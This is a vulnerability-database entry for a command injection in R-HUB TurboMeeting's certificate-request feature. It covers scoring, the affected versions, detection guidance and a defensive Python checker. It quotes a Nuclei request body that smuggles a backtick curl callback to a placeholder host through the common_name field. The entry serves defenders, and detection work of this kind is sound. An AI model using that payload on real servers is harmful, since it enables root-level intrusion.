CVE-2024-38288
Published 2024-07-25
Priority P2 (58) · Severity: High · CVSS 3.1 base score: 7.2
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Exploit: available (Nuclei template) · EPSS: 3.22% (86.6th percentile)
A command-injection issue in the Certificate Signing Request (CSR) functionality in R-HUB TurboMeeting through 8.x allows authenticated attackers with administrator privileges to execute arbitrary commands on the underlying server as root.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rhubcom | turbomeeting | < 8.0 | 8.0 |
Detection & IOCs (extracted from sources)
Command (request body from the Nuclei template): sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR
- Monitor POST requests to /as/wapi/generate_csr containing shell metacharacters (backticks, percent-encoded quotes, pipe characters) in the common_name, company_name, state, city, or country fields — these indicate command injection attempts in the CSR generation endpoint.
- Alert on successful authentication to /as/wapi/login followed immediately by a POST to /as/wapi/generate_csr within the same session (sid), especially from admin accounts, as this matches the exploit flow.
- Look for outbound DNS or HTTP callbacks (e.g., curl to external hosts) originating from the TurboMeeting server process, which may indicate successful command injection via the CSR feature.
- The session ID (sid) is extracted from a redirect URL pattern after login; monitor for automated extraction of sid values followed by CSR generation requests as a sign of scripted exploitation.
- Exploitation requires valid administrator credentials — this is a post-authentication vulnerability, so detections should be scoped to authenticated admin sessions.
- The injected commands execute as root on the underlying server, meaning successful exploitation grants full system compromise; prioritize detection and response accordingly.
- The vulnerability affects R-HUB TurboMeeting through version 8.x; ensure detection rules are applied to all instances up to and including the 8.x branch.
- The exploit template uses a 20-second timeout for the CSR request, suggesting the injected command may introduce a delay; network-level detections should account for unusually long response times on /as/wapi/generate_csr.
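The first two detection notes above, worked into Python as an added example that is not part of this record or of the Nuclei template: one check decodes the CSR form fields of a request and flags shell metacharacters, the other correlates a login with a CSR request in the same sid. The request samples and the (timestamp, sid, path) event shape are constructed assumptions, not a TurboMeeting log format.

```python
import re
from urllib.parse import parse_qs

LOGIN_PATH = "/as/wapi/login"
CSR_PATH = "/as/wapi/generate_csr"
# Form fields of the CSR request; the detection notes name all five as injection points.
CSR_FIELDS = ("common_name", "company_name", "state", "city", "country")
# Shell metacharacters that never belong in a certificate subject field.
META = re.compile(r'[`"\'|;&$<>\n]')

def csr_injection_fields(path, body):
    """Return the CSR fields whose percent-decoded value contains shell metacharacters.

    body is the raw application/x-www-form-urlencoded POST body; parse_qs decodes
    it, so %22 (") and %60 (`) are inspected as the characters they encode.
    """
    if path != CSR_PATH:
        return []
    params = parse_qs(body, keep_blank_values=True)
    return [f for f in CSR_FIELDS if any(META.search(v) for v in params.get(f, []))]

def login_then_csr(events, window_s=60):
    """Return the sids that hit generate_csr within window_s seconds of a login.

    events: (timestamp_seconds, sid, path) tuples in any order. The sid on the
    login event is assumed to have been taken from the post-login redirect.
    """
    logins, flagged = {}, set()
    for ts, sid, path in sorted(events):
        if path == LOGIN_PATH:
            logins[sid] = ts
        elif path == CSR_PATH and sid in logins and ts - logins[sid] <= window_s:
            flagged.add(sid)
    return flagged

# Constructed samples: a benign CSR request, then one carrying a percent-encoded
# quote and backticks in common_name, as the detection notes describe.
SAMPLES = [
    (CSR_PATH, "sid=abc&common_name=vpn.example.test&company_name=Example"
               "&state=CA&city=SF&country=US&submit=Generate+CSR"),
    (CSR_PATH, "sid=abc&common_name=1%22%20%60x%60&company_name=1"
               "&state=1&city=1&country=US&submit=Generate+CSR"),
]
EVENTS = [(100, "abc", LOGIN_PATH), (105, "abc", CSR_PATH), (100, "zzz", CSR_PATH)]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, "suspicious fields:", csr_injection_fields(path, body))
    print("login followed by CSR generation:", login_then_csr(EVENTS))
```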
No advisories linked to this vulnerability.
No detection rules found.
Nuclei template: CVE-2024-38288 [HIGH] TurboMeeting - Post-Authentication Command Injection (CVSS 7.2)
The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed with root privileges.
Template:
```yaml
id: CVE-2024-38288
info:
  name: TurboMeeting - Post-Authentication Command Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admi
```
No writeups or analysis indexed.